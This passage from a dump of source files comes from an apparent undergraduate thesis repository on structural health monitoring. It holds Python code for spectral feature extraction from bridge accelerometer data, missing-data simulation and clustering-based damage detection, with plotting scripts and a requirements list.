"max_line_length": 94,
"num_lines": 147,
"path": "/algorithms/feature_extraction/step_extraction.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport numpy.matlib\nfrom scipy import signal\n\n\ndef nextpow2(i):\n i = abs(i)\n\n n = 0\n\n while True:\n if 2 ** n >= i:\n return n\n\n n += 1\n\n\ndef fct_fft(x, dt):\n try:\n nrow, ncol = x.shape # matrix dimensions\n except ValueError:\n nrow, = x.shape\n ncol = 1\n\n # t = (0:nrow - 1)*dt # Time vector\n t = [x * dt for x in range(0, nrow)] # Time vector\n Fs = 1 / dt # Sampling frequency\n\n # Exponential window for accelerometers\n hann_window = np.hanning(nrow)\n\n m = x * hann_window\n\n NFFT = 2 ** nextpow2(nrow) # Next power of 2 from length of y(t)\n\n freq = Fs / 2 * np.linspace(0, 1, NFFT / 2) # Nyquist frequency\n\n AUX = np.fft.fft(m, NFFT) / nrow\n\n yfft = AUX[0:int(NFFT / 2)]\n\n return freq, yfft\n\n\ndef feature_shm_ufpa(data, dt, limits):\n # dt data increment in seconds\n fs = 1 / dt # frequency\n\n # Application of a filter\n\n # % Design a Butterworth IIR digital filter\n # For data sampled at 100 Hz, design a 3th-order highpass Butterworth\n # filter, with a cutoff frequency of 3 Hz, which corresponds to a\n # normalized value of 0.06.\n\n wn = 2 / (fs / 2) # normalized cutoff frequency Wn (2 Hz)\n\n # [bb, aa] = butter(3, wn, 'high')\n bb, aa = signal.butter(3, wn, 'highpass')\n\n # Performs zero-phase digital filtering by processing the input data\n data = signal.filtfilt(bb, aa, data)\n\n # clear aa bb\n del bb\n del aa\n\n #################################\n # Estimate the FFT\n\n # Hanning window\n xfreq, Yfft = fct_fft(data, dt)\n\n m = len(xfreq)\n\n df = xfreq[1] - xfreq[0]\n\n # Auto-power spectral density\n psd = 1 / (m * dt) * Yfft * Yfft.conj()\n\n #################################\n # Averaged normalized power spectral density - ANPSD\n\n # Estimate ANPSD\n\n mean_vector = np.sum(psd)\n\n # Reshape necessário para que tenha o mesmo shape que o resultado do repmat no mean_vector\n psd = numpy.reshape(psd, (m, 1))\n\n NPSD = psd / numpy.matlib.repmat(mean_vector, m, 1)\n\n ANPSD = np.sum(NPSD, axis=1)\n\n #################################\n # Extract the natural frequencies\n a1 = limits[0][0]\n d1 = limits[0][1]\n\n indx = np.argmax(abs(ANPSD[a1 - d1 - 1: a1 + d1]))\n ind = a1 - d1 + indx - 1\n freq1 = xfreq[ind]\n\n a1 = limits[1][0]\n d1 = limits[1][1]\n\n indx = np.argmax(abs(ANPSD[a1 - d1 - 1: a1 + d1]))\n ind = a1 - d1 + indx - 1\n freq2 = xfreq[ind]\n\n energy = np.trapz(abs(ANPSD[round(len(ANPSD) / 2):len(ANPSD)]))\n\n return [freq1, freq2, energy]\n\n\ndef step_extraction(data, col):\n \"\"\"\n STEP_EXTRACTION Etapa de extração de features.\n\n% São utilizadas 3 features do sinal para a detecção de danos:\n% As duas primeiras são a Primeira e Terceira Frequência Natural (F1 e\n% F3, respectivamente).\n% A terceira consiste na quantidade de energia presente na segunda metade\n% do espectro.\n\n% INPUT\n% data: Matrix com as leitura dos acelerômetros no domínio do tempo.\n% col: Coluna da matriz com as leituras desejadas. Nos dados\n% originais, col=2 equivale às leituras do sensor 5. Nos dados\n% comprimidos, normalmente col=1, pois se comprimiu as leituras de\n% apenas um sensor.\n\n% OUTPUT\n feat_vector: Feature vector com as 3 features (F1, F3, A).\n \"\"\"\n\n # Propriedades de amostragem\n dt = 0.01 # segundos\n\n # Janelas para estimar as frequências naturais F1 e F3.\n limits = [[2600, 300], [6600, 900]]\n\n data_coluna = data # Pegar data só de uma coluna\n\n feat_vector = feature_shm_ufpa(data_coluna, dt, limits)\n\n return feat_vector\n"
},
{
"alpha_fraction": 0.6230529546737671,
"alphanum_fraction": 0.636137068271637,
"avg_line_length": 33.1489372253418,
"blob_id": "a2ddd8ee6dec4ff12ae6eecd3844611b34f90bf2",
"content_id": "ff2a768f352120fcaea1defdbcf59f27b16a7460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1606,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 47,
"path": "/algorithms/feature_extraction/full_database_feature_extraction.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import csv\nimport decimal\nimport time\n\nimport os\nimport re\n\nfrom algorithms.feature_extraction.feature_extraction import extract_features\n\n\ndef save_features_to_csv_file(missing_data_percentage, num_iterations=1, imputation_strategy=None):\n files_directory = '/home/alessandro/FELIPE/Z24_bridge/Z24Date/'\n\n # Pegar todos os arquivos registrados às 12h\n files = [f for f in os.listdir(files_directory) if re.match(r'.*_12\\.mat', f)]\n files.sort()\n\n for i in range(num_iterations):\n t0 = time.time()\n\n extracted_data = []\n\n for j, filename in enumerate(files):\n print('#{} | {} | Extracting {} ...'.format(i + 1, j + 1, filename))\n extracted_data.append(\n extract_features(files_directory + filename, missing_data_percentage, imputation_strategy))\n\n print(\">> Criando arquivo csv...\")\n\n file_name = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/{}' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(\n ('{}/'.format(imputation_strategy.description) if imputation_strategy else ''), missing_data_percentage, i)\n\n with open(file_name, 'w') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=',')\n\n for row in extracted_data:\n csv_writer.writerow([round(x, 4) for x in row])\n\n t1 = time.time()\n total = t1 - t0\n\n print('Tempo passado: {}'.format(total))\n\n\ndef get_number_decimal_places_from_float(float_number):\n return decimal.Decimal(str(float_number)).as_tuple().exponent * -1\n"
},
{
"alpha_fraction": 0.6869051456451416,
"alphanum_fraction": 0.6960945129394531,
"avg_line_length": 56.49056625366211,
"blob_id": "aaf88cfbb8dee774d029ab8090c5e847afd927e1",
"content_id": "3e6a5563112544c5d3d8eb1b66ddd523d121d673",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3052,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 53,
"path": "/results/results_analysis_2.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport pandas as pd\n\ndf_amputation = pd.read_csv('/home/alessandro/Documentos/Programming/Projects/TCC1/results/new_results.csv')\ndf_imputation = pd.read_csv(\n '/home/alessandro/Documentos/Programming/Projects/TCC1/results/imputation/results_Mean_Imputation.csv')\n\n# list_algorithms = ['K-Means', 'Fuzzy_C_Means', 'Affinity_Propagation', 'GMM', 'G_Means']\nlist_algorithms = ['K-Means', 'Fuzzy_C_Means', 'Affinity_Propagation', 'GMM', 'G_Means', 'DBSCAN_Center']\n# list_algorithms = ['K-Means']\n\nlist_colors = ['red', 'green', 'blue', '#f4c141', '#f442df', '#666564']\n\nfor i, algorithm_name in enumerate(list_algorithms):\n individual_results = df_imputation[df_imputation['algorithm'] == algorithm_name]\n individual_results_amputation = df_amputation[df_amputation['algorithm'] == algorithm_name]\n\n sensitivity = individual_results['true_positives'] / (\n individual_results['true_positives'] + individual_results['error_type_II'])\n specificity = individual_results['true_negatives'] / (\n individual_results['true_negatives'] + individual_results['error_type_I'])\n precision = individual_results['true_positives'] / (\n individual_results['true_positives'] + individual_results['error_type_I'])\n recall = sensitivity\n accuracy = (individual_results['true_positives'] + individual_results['true_negatives']) / (\n individual_results['true_positives'] + individual_results['true_negatives'] + individual_results['error_type_I'] +\n individual_results['error_type_II'])\n\n plt.plot(individual_results['missing_data_percentage'], precision, label=algorithm_name + \" (Imputação | Média)\",\n linestyle='dashed', color=list_colors[i])\n\n sensitivity_amputation = individual_results_amputation['true_positives'] / (\n individual_results_amputation['true_positives'] + individual_results_amputation['error_type_II'])\n specificity_amputation = individual_results_amputation['true_negatives'] / (\n individual_results_amputation['true_negatives'] + individual_results_amputation['error_type_I'])\n precision_amputation = individual_results_amputation['true_positives'] / (\n individual_results_amputation['true_positives'] + individual_results_amputation['error_type_I'])\n accuracy_amputation = (individual_results_amputation['true_positives'] + individual_results_amputation[\n 'true_negatives']) / (\n individual_results_amputation['true_positives'] + individual_results_amputation[\n 'true_negatives'] + individual_results_amputation['error_type_I'] +\n individual_results_amputation['error_type_II'])\n\n plt.plot(individual_results_amputation['missing_data_percentage'], precision_amputation,\n label=algorithm_name + \" (Amputação)\", color=list_colors[i])\n\n plt.ylabel(\"Precision\")\n plt.xlabel(\"Porcentagem de dados faltantes\")\n plt.legend(bbox_to_anchor=(0.1, 0.2), loc=2, borderaxespad=0.)\n\n plt.xticks([0, 5, 7, 10, 15])\n\n plt.show()\n"
},
{
"alpha_fraction": 0.6305263042449951,
"alphanum_fraction": 0.6368421316146851,
"avg_line_length": 35.57692337036133,
"blob_id": "e4897a7c6190c8372f58d2dc10dc8c5abdfc17d2",
"content_id": "94cf026452b3dc687a03dc33beb1a948734ea0fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 950,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 26,
"path": "/components/missing_data_simulator.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import random\nimport numpy as np\n\n\nclass MissingDataSimulator:\n \"\"\" The simulation of missing data is based on the assumption of MCAR (Missing Completely at Random) \"\"\"\n\n def __init__(self, original_data, missing_data_percentage):\n self.original_data = original_data\n self.missing_data_percentage = missing_data_percentage\n\n def simulate_missing_data(self):\n \"\"\"Replaces the samples chosen randomly to be removed with numpy.NaN and returns a new list\"\"\"\n num_samples_to_be_removed = round(len(self.original_data) * (self.missing_data_percentage / 100))\n\n new_database = list(self.original_data)\n\n for i in range(0, num_samples_to_be_removed):\n while True:\n rand_num = random.randint(0, len(new_database) - 1)\n\n if not np.isnan(new_database[rand_num]):\n new_database[rand_num] = np.NaN\n break\n\n return new_database"
},
{
"alpha_fraction": 0.4963977038860321,
"alphanum_fraction": 0.6938040256500244,
"avg_line_length": 15.523809432983398,
"blob_id": "3a68b9f7a8605bba5c6820f9b976821ef08fff92",
"content_id": "f84b04b04de7101de0b52c6fd4fdff06d606f182",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1388,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 84,
"path": "/requirements.txt",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "absl-py==0.2.2\nastor==0.6.2\nbleach==1.5.0\ncvxpy==1.0.6\ncycler==0.10.0\ndecorator==4.2.1\ndill==0.2.7.1\necos==2.0.5\nentrypoints==0.2.3\nfancyimpute==0.3.1\nfastcache==1.0.2\nfuture==0.16.0\ngast==0.2.0\ngrpcio==1.12.1\nh5py==2.8.0\nhtml5lib==0.9999999\nipykernel==4.8.0\nipython==6.2.1\nipython-genutils==0.2.0\nipywidgets==7.1.1\njedi==0.11.1\nJinja2==2.10\njsonschema==2.6.0\njupyter==1.0.0\njupyter-client==5.2.2\njupyter-console==5.2.0\njupyter-core==4.4.0\nKeras==2.2.0\nKeras-Applications==1.0.2\nKeras-Preprocessing==1.0.1\nknnimpute==0.1.0\nMarkdown==2.6.11\nMarkupSafe==1.0\nmatplotlib==2.1.2\nmistune==0.8.3\nmpmath==1.0.0\nmultiprocess==0.70.5\nnbconvert==5.3.1\nnbformat==4.4.0\nnetworkx==2.1\nnose==1.3.7\nnotebook==5.3.1\nnumpy==1.14.0\nosqp==0.3.1\npandas==0.22.0\npandocfilters==1.4.2\nparso==0.1.1\npexpect==4.3.1\npickleshare==0.7.4\npkg-resources==0.0.0\nply==3.10\nprompt-toolkit==1.0.15\nprotobuf==3.6.0\nptyprocess==0.5.2\nPygments==2.2.0\npyparsing==2.2.0\npython-dateutil==2.6.1\npytz==2017.3\nPyYAML==3.12\npyzmq==16.0.4\nqtconsole==4.3.1\nscikit-fuzzy==0.3.1\nscikit-learn==0.19.1\nscipy==1.0.0\nscs==2.0.2\nseaborn==0.8.1\nSend2Trash==1.4.2\nsimplegeneric==0.8.1\nsix==1.11.0\nsklearn==0.0\nsmop==0.0.0\nsympy==1.1.1\ntensorboard==1.8.0\ntensorflow==1.8.0\ntermcolor==1.1.0\nterminado==0.8.1\ntestpath==0.3.1\ntoolz==0.9.0\ntornado==4.5.3\ntraitlets==4.3.2\nwcwidth==0.1.7\nwebencodings==0.5.1\nWerkzeug==0.14.1\nwidgetsnbextension==3.1.3\n"
},
{
"alpha_fraction": 0.7099424600601196,
"alphanum_fraction": 0.7198027968406677,
"avg_line_length": 38.25806427001953,
"blob_id": "43e0484b0c9595645bea7d4218a4951a60bbc2e6",
"content_id": "b54ffe73556e680cefb3269a0bc4c934091779d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 31,
"path": "/results/results_analysis.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport pandas as pd\n\n# df = pd.read_csv('/home/alessandro/Documentos/Programming/Projects/TCC1/results/new_results.csv')\ndf = pd.read_csv('/home/alessandro/Documentos/Programming/Projects/TCC1/results/imputation/results_Mean_Imputation.csv')\n\nlist_algorithms = ['K-Means', 'Fuzzy_C_Means', 'DBSCAN_Center', 'Affinity_Propagation', 'GMM', 'G_Means']\n\nfor algorithm_name in list_algorithms:\n individual_results = df[df['algorithm'] == algorithm_name]\n\n print(individual_results)\n\n plt.plot(individual_results['missing_data_percentage'], individual_results['error_type_I'], label=\"Erros Tipo 1\")\n plt.plot(individual_results['missing_data_percentage'], individual_results['error_type_II'], label=\"Erros Tipo 2\")\n\n plt.title(algorithm_name)\n plt.ylabel(\"Número de erros\")\n plt.xlabel(\"Porcentagem de dados faltantes\")\n plt.legend(bbox_to_anchor=(0.8, 1.14), loc=2, borderaxespad=0.)\n\n locs, labels = plt.xticks()\n\n plt.xticks(individual_results['missing_data_percentage'])\n\n # plt.savefig('/home/alessandro/Documentos/Programming/Projects/TCC1/results/atualizados/{}.png'.format(algorithm_name))\n plt.show()\n\n plt.clf()\n plt.cla()\n plt.close()\n"
},
{
"alpha_fraction": 0.574986457824707,
"alphanum_fraction": 0.5861242413520813,
"avg_line_length": 32.151283264160156,
"blob_id": "d64e30ac61e0251cacfec7966bb49be5d58209db",
"content_id": "3e1e77fb3dba7aad480b9966e78fed3b308e0cbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12929,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 390,
"path": "/algoritmos_felipe/DamageDetection.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "from __future__ import division, print_function\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.spatial.distance as distances\nimport skfuzzy as fuzz\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.cluster import KMeans, AffinityPropagation\nfrom sklearn.metrics import calinski_harabaz_score\nfrom sklearn.mixture import GaussianMixture\n\nfrom algoritmos_felipe.GMeans import GMeans\n\n\nclass DummySubplot:\n def plot(self, *args):\n pass\n\n def add_artist(self, *args):\n pass\n\n def axis(self, *args):\n pass\n\n\nclass DamageDetection:\n def __init__(self):\n self.DIs = None\n self._train_DIs = None\n self._data_break_point = None\n pass\n\n def train_and_test(self, training_data, test_data, break_point):\n pass\n\n def _set_resulting_parameters(self):\n # CALCULAR THRESHOLD\n lv = 0.95\n n = len(self.DIs)\n\n UCL = self._train_DIs[int(np.floor(len(self._train_DIs) * lv))]\n flag = np.zeros(n, dtype=bool)\n flag[self._data_break_point:] = 1\n\n # CALCULAR ACERTOS E ERROS TIPO I e II\n class_states = np.zeros(n)\n err_t1 = 0\n err_t2 = 0\n for i in range(n):\n if self.DIs[i] > UCL:\n if flag[i] == 0:\n class_states[i] = 3\n err_t1 += 1\n else:\n class_states[i] = 1\n elif flag[i] == 1:\n class_states[i] = 4\n err_t2 += 1\n else:\n class_states[i] = 2\n\n # CLASS STATE DIZ 1 = VERDADEIRO POSITIVO, 2=VERDADEIRO NEGATIVO, 3=FALSO POSITIVO, 4=FALSO NEGATIVO\n self.class_states = class_states\n self.UCL = UCL\n self.err = (err_t1, err_t2)\n\n\n# FUNCIONANDO_TESTE/LIMPO/\nclass K_Means(DamageDetection):\n def __init__(self, number_of_clusters=None):\n super().__init__()\n self.number_of_clusters = number_of_clusters\n\n @staticmethod\n def find_optimal_K(training_data, min_number_of_clusters, max_number_of_clusters):\n max_calinski_harabaz = {\n 'num_clusters': 0,\n 'score': -1\n }\n\n for i in range(min_number_of_clusters, max_number_of_clusters + 1):\n kmeans = KMeans(n_clusters=i, random_state=0).fit(training_data)\n\n score = calinski_harabaz_score(training_data, kmeans.labels_)\n\n if score >= max_calinski_harabaz['score']:\n max_calinski_harabaz['num_clusters'] = i\n max_calinski_harabaz['score'] = score\n\n return max_calinski_harabaz['num_clusters']\n\n def train_and_test(self, training_data, test_data, break_point):\n if not self.number_of_clusters:\n self.number_of_clusters = K_Means.find_optimal_K(training_data, min_number_of_clusters=2,\n max_number_of_clusters=11)\n\n # Aplica o KMEANS na base de dados de treino\n kmeans = KMeans(n_clusters=self.number_of_clusters, random_state=0).fit(training_data)\n\n # self.plot_clusters(kmeans, training_data)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_dist = kmeans.transform(training_data)\n train_min_dist = np.zeros(len(training_data))\n for i in range(len(train_dist)):\n train_min_dist[i] = min(train_dist[i])\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n test_dist = kmeans.transform(test_data)\n test_min_dist = np.zeros(len(test_dist))\n for i in range(len(test_dist)):\n test_min_dist[i] = min(test_dist[i])\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n def plot_clusters(self, kmeans_model, train_data):\n labels = kmeans_model.labels_\n\n plt.scatter(range(0, len(train_data)), train_data[:, 0], c=labels, s=20, cmap='viridis')\n plt.show()\n\n# FUNCIONANDO_TESTE/LIMPO\nclass Fuzzy_C_Means(DamageDetection):\n def __init__(self, number_of_clusters=None):\n 
super().__init__()\n self.number_of_clusters = number_of_clusters\n\n @staticmethod\n def find_optimal_K(training_data, min_number_of_clusters, max_number_of_clusters):\n max_calinski_harabaz = {\n 'num_clusters': 0,\n 'score': -1\n }\n\n for i in range(min_number_of_clusters, max_number_of_clusters + 1):\n cntr, u, u0, d, jm, p, fpc = fuzz.cluster.cmeans(training_data.T, i, 5, error=0.005, maxiter=1000,\n init=None, seed=1)\n\n cluster_membership = np.argmax(u, axis=0)\n\n score = calinski_harabaz_score(training_data, cluster_membership)\n\n if score >= max_calinski_harabaz['score']:\n max_calinski_harabaz['num_clusters'] = i\n max_calinski_harabaz['score'] = score\n\n return max_calinski_harabaz['num_clusters']\n\n def train_and_test(self, training_data, test_data, break_point):\n if not self.number_of_clusters:\n self.number_of_clusters = Fuzzy_C_Means.find_optimal_K(training_data, 2, 11)\n\n cntr, u, _, d, _, _, fpc = fuzz.cluster.cmeans(\n training_data.T, self.number_of_clusters, 5, error=0.005, maxiter=1000, init=None, seed=1)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.min(d, axis=0)\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n _, _, d, _, _, _ = fuzz.cluster.cmeans_predict(\n test_data.T, cntr, 2, error=0.005, maxiter=1000)\n\n test_min_dist = np.min(d, axis=0)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\n# FUNCIONANDO_TESTE/LIMPO\nclass DBSCAN_Center(DamageDetection):\n def __init__(self, eps, min_points):\n super().__init__()\n self.eps = eps\n self.min_points = min_points\n\n def train_and_test(self, training_data, test_data, break_point):\n db = DBSCAN(self.eps, self.min_points).fit(training_data)\n\n # CALCULAR CENTROS\n\n labels = np.unique(db.labels_)\n\n max_label = max(labels)\n\n centers = np.zeros((max_label + 1, 2))\n\n # print(centers)\n\n for i in range(len(labels) - 1):\n if max_label == 0 and len(labels) == 1:\n indices = np.argwhere(db.labels_ == labels[i]).T[0]\n else:\n indices = np.argwhere(db.labels_ == labels[i + 1]).T[0]\n points = training_data[indices]\n x = [p[0] for p in points]\n y = [p[1] for p in points]\n centroid = (sum(x) / len(points), sum(y) / len(points))\n centers[i] = centroid\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n\n train_min_dist = np.zeros(len(training_data))\n for i, point in enumerate(training_data):\n if db.labels_[i] == -1:\n train_min_dist[i] = -1\n continue\n train_min_dist[i] = distances.euclidean(point, centers[db.labels_[i]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n\n n = len(test_data)\n test_min_dist = np.zeros((n, max_label + 1))\n for i, point in enumerate(test_data):\n for j, center in enumerate(centers):\n test_min_dist[i, j] = distances.euclidean(point, center)\n\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\n# FUNCIONANDO_TESTE/LIMPO\nclass Affinity_Propagation(DamageDetection):\n def __init__(self):\n super().__init__()\n\n def train_and_test(self, training_data, test_data, break_point):\n aff = AffinityPropagation().fit(training_data)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.zeros(len(training_data))\n for i, point in enumerate(training_data):\n if aff.labels_[i] == 
-1:\n train_min_dist[i] = -1\n continue\n train_min_dist[i] = distances.euclidean(point, aff.cluster_centers_[aff.labels_[i]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n n = len(test_data)\n\n test_min_dist = np.zeros((n, len(aff.cluster_centers_)))\n for i, point in enumerate(test_data):\n for j, center in enumerate(aff.cluster_centers_):\n test_min_dist[i, j] = distances.euclidean(point, center)\n\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\n# FUNCIONANDO_TESTE/LIMPO\nclass GMM(DamageDetection):\n def __init__(self, n_components=1):\n super().__init__()\n self.n_components = n_components\n\n def train_and_test(self, training_data, test_data, break_point):\n n_components = self.n_components\n\n gmm = GaussianMixture(n_components=n_components).fit(training_data)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.zeros(len(training_data))\n train_predicted = gmm.predict(training_data)\n for i, point in enumerate(training_data):\n train_min_dist[i] = distances.euclidean(point, gmm.means_[train_predicted[i]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n n = len(test_data)\n\n test_min_dist = np.zeros((n, n_components))\n for i, point in enumerate(test_data):\n for j, center in enumerate(gmm.means_):\n test_min_dist[i, j] = distances.euclidean(point, center)\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\nclass G_Means(DamageDetection):\n def __init__(self):\n super().__init__()\n\n def train_and_test(self, training_data, test_data, break_point):\n gmeans = GMeans(strictness=4)\n gmeans.fit(training_data)\n\n # CALCULAR CENTROS\n labels = np.unique(gmeans.labels_)\n max_label = len(labels)\n centers = np.zeros((max_label + 1, training_data.shape[1]))\n a = {}\n for i, label in enumerate(labels):\n indices = np.argwhere(gmeans.labels_ == label).T[0]\n points = training_data[indices]\n a.update({label: i})\n for j in range(training_data.shape[1]):\n centers[i, j] = sum([p[j] for p in points]) / len(points)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.zeros(len(training_data))\n for i, point in enumerate(training_data):\n train_min_dist[i] = distances.euclidean(point, centers[a[gmeans.labels_[i]]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n\n n = len(test_data)\n test_min_dist = np.zeros((n, max_label + 1))\n for i, point in enumerate(test_data):\n for j, center in enumerate(centers):\n test_min_dist[i, j] = distances.euclidean(point, center)\n\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n self._number_of_clusters = max_label\n self._set_resulting_parameters()\n\n\ndef method_name_1():\n current_file = 'C:/Users/Felipe/Documents/UFPA/TCC/manoel_afonso-matlab-0d7ca42aed75' \\\n '/sinal_aproximado_normalizado/original/Features_Orig_Hora_12_COL_2.csv'\n data = np.genfromtxt(current_file, delimiter=',')\n data = data[:, [0, 1]]\n return data\n\n\nif __name__ == \"__main__\":\n 
from numpy import genfromtxt\n\n all_data = method_name_1()\n\n print(all_data.shape)\n learn_data = all_data[1:158, :]\n\n alg = DBSCAN_Center(0.09, 3)\n alg.train_and_test(learn_data, all_data, 197)\n print(alg.err)\n\n # for i in range(158):\n # print(euclidean_distances(learn_data[0,:],learn_data[1,:]))\n\n\n '''alg.train_and_test(learn_data, all_data, 197)\n\n dis_1 = alg.DIs\n UCL_1 = alg.UCL\n print(alg.err)\n\n plt.plot(range(234), dis_1, 'o')\n plt.axhline(y=UCL_1, color='k', linestyle='-')\n\n plt.axis('tight')\n\n plt.show()'''\n"
},
{
"alpha_fraction": 0.7876712083816528,
"alphanum_fraction": 0.7876712083816528,
"avg_line_length": 47.66666793823242,
"blob_id": "8f2c29fd40c6d2d74009258c93706b90fa8980ea",
"content_id": "549787691d31de9b74ee2d4ee23ff249346add26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 3,
"path": "/README.md",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "# Framework SHM UFPA\n\nRepositório utilizado para os códigos do meu trabalho de conclusão de curso (TCC) com orientação do professor Claudomiro Sales (UFPA)\n"
},
{
"alpha_fraction": 0.6393442749977112,
"alphanum_fraction": 0.654566764831543,
"avg_line_length": 28.79069709777832,
"blob_id": "93f76fe7fd4cff74cfa6111d613fbcc0a91b2045",
"content_id": "ab3230fde98ba7668477773328b6e0a22d394f78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2582,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 86,
"path": "/algorithms/feature_extraction/feature_extraction.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport scipy.io\n\nfrom algorithms.feature_extraction.step_extraction import step_extraction\n\n\ndef simulate_missing_data(data, missing_data_percentage):\n num_samples_to_be_removed = round(len(data) * (missing_data_percentage / 100))\n\n new_database = list(data)\n\n for i in range(0, num_samples_to_be_removed):\n while True:\n rand_num = random.randint(0, len(new_database) - 1)\n\n if not np.isnan(new_database[rand_num]):\n new_database[rand_num] = np.NaN\n break\n\n return new_database\n\n\ndef realizar_amputacao_dados(data):\n return [x for x in data if not np.isnan(x)]\n\n\ndef normalize_var(array, x, y):\n \"\"\"\n Normaliza os valores de um array no intervalo [x,y].\n\n :param array: Valores originais.\n :param x: Intervalo para a normalização (ex.: [0,1]).\n :param y: Intervalo para a normalização (ex.: [0,1]).\n :return: Valores normalizados\n \"\"\"\n\n m = min(array)\n\n range = max(array) - m\n\n array = (array - m) / range\n\n range2 = y - x\n normalized = (array * range2) + x\n\n return normalized\n\n\ndef extract_features(dataset_path, missing_data_percentage=0, imputation_strategy=None):\n \"\"\"\n %% Stand-alone Feature Extraction\n % Extrai as features do sinal original e aproximado. Sendo que o sinal\n % aproximado já está disponível em algum diretório. As features serão\n % salvas sobrescrevendo os arquivos já existentes para cada limiar de cada\n % algoritmo. Este script é útil caso se deseje alterar o cálculo das\n % features, bem como incluir outras.\n \"\"\"\n\n # Qual sensor usaremos para comprimir (há 8 sensores no total).\n # COLUNA 1 2 3 4 5 6 7 8\n # SENSOR 3 5 6 7 10 12 14 16\n canal = 1\n\n temp = scipy.io.loadmat(dataset_path)\n\n # Obtém apenas a matriz desta observação com os 8 canais.\n dataset_orig = temp['data']\n\n # Obtém as leituras do canal de interesse.\n dataset_orig = dataset_orig[:, canal]\n\n # Normalização. (Let's hope this won't break the script).\n dataset_orig = normalize_var(dataset_orig, -1, 1)\n\n dataset_missing_data = simulate_missing_data(dataset_orig, missing_data_percentage)\n\n if imputation_strategy:\n dataset_orig = imputation_strategy.impute_data(dataset_missing_data)\n else:\n dataset_orig = realizar_amputacao_dados(dataset_missing_data)\n\n # Extrai as features do sinal original.\n feat_vector_orig = step_extraction(dataset_orig, 1)\n\n return feat_vector_orig\n"
},
{
"alpha_fraction": 0.6296296119689941,
"alphanum_fraction": 0.6553288102149963,
"avg_line_length": 43.099998474121094,
"blob_id": "24a95fd79be93c3baec72162e39d0d775fca7ae7",
"content_id": "c54c4f58531f4be8962a3ce94f88ce314ecfb80f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
